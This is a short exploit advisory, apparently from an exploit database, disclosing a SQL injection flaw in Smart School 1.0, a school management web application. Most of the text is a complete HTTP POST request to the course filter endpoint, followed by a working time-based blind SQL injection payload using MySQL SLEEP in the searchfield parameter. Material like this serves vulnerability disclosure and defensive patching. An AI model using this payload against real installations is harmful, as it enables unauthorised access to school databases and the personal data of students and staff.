Headline
Smart School 1.0 SQL Injection
Smart School version 1.0 suffers from a remote SQL injection vulnerability.
# Exploit Title: Smart School v1.0 - SQL Injection# Date: 2023-05-17# Exploit Author: Ahmet Ümit BAYRAM# Vendor: https://codecanyon.net/item/smart-school-school-management-system/19426018# Demo Site: https://demo.smart-school.in# Tested on: Kali Linux# CVE: N/A### Request ###POST /course/filterRecords/ HTTP/1.1Host: localhostCookie: ci_session=dd1bqn8ulsiog4vf7fle5hd4k4fklvveUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101Firefox/102.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 136Origin: https://localhostReferer: https://localhost/course/Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailersConnection: closesearchdata%5B0%5D%5Btitle%5D=category&searchdata%5B0%5D%5Bsearchfield%5D=online_courses.category_id&searchdata%5B0%5D%5Bsearchvalue%5D=1### Parameter & Payloads ###Parameter: searchdata[0][searchfield] (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload:searchdata[0][title]=category&searchdata[0][searchfield]=online_courses.category_idAND (SELECT 7313 FROM (SELECT(SLEEP(5)))mvaR)--hAHp&searchdata[0][searchvalue]=1